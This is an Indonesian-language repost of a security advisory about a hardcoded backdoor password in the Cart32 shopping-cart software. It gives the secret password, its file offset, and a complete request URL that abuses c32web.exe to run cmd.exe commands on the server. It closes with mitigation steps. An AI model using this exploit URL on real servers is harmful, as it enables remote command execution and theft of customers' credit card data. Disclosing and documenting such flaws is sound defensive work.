password backdoor

Info mengenai CART32.exe password backdoor bug :

Name of the bug : Cart32 secret password backdoor
Affected Systems : Semua jenis web server dengan Cart32 versions 3.0 (versi paling uptodate) and 2.6 terpengaruh yg ber basis Win32
Issue : Attackers can run arbitary commands on the web server and/or gain access to credit card information.
Authors : David Litchfield (mnemonix@globalnet.co.uk) and Mark Litchfield (xor-syst@devilnet.co.uk)

The Cerberus Security Team telah menemukan security hole pada McMurtrey/Whitaker & Associates, Inc's Win32 e-Commerce shopping cart,yg lebih dikenal dengan nama Cart32 (http://www.cart32.com/ ). Tentunya aplikasi ini dapat lebih ok jika disebut sebagai “pintu belakang” untuk mendapatkan informasi credit card.
Pada cart32.exe ini file yg menyediakan function utama untuk aplikasi ini dapat digunakan untuk mendapatkan password yg tersembunyi dan dengan file ini pula hacker dapat menjalankan command pada server contohnya seperti mendapatkan credit card customer pada shopping cart properties secara detil termasuk juga di dalamnya alamat pengirim dan informasi rahasia lainnya.

Detail

Pada cart32.exe terdapat backdoor password yaitu “wemilo”(ditemukan pada offset 0x6204h) yg merupakan Cart32 internal password (pada dasarnya client mereka merupakan shopping site)

Code dapat dijalankan melalui command pada saat konfirmasi belanjaan :

http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&
SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&
Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&
CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

URL ini akan setting property dari shell cart, sehingga menghasilkan listing directory dan pipe output ke text file yaitu file.txt pada root C: pada saat pembelian di konfirmasi.
Setelah melakukan hal ini hacker akan melakukan step berikutnya yaitu menciptakan suatu order dan konfirmasi palsu utk di executed.
(Note. Perlu anda ketahui bahwa contoh URL di atas berhubungan dengan server Cerberus –detil password dan client perlu diubah jika ingin mencobanya pada site lain)

Solusi :

Berdasarkan hasil testing Cerberus labs :

Download Hex Editor, cthnya seperti UltraEdit (http://www.ultraedit.com) dan ganti password “wemilo” menjadi yg lain.
c32web.exe merupakan program administrasi pada Cart32 dan hanya diakses oleh Administrator maka anda harus set permission ke file ini (dan tentu saja dengan NTFS setting) sehingga file ini tidak dapat dijalankan oleh pihak lain selain admin. Untuk server yg menggunakan Windows95 atau 98, file ini sebaiknya di hapus.
That's all we can tell you guyzzz.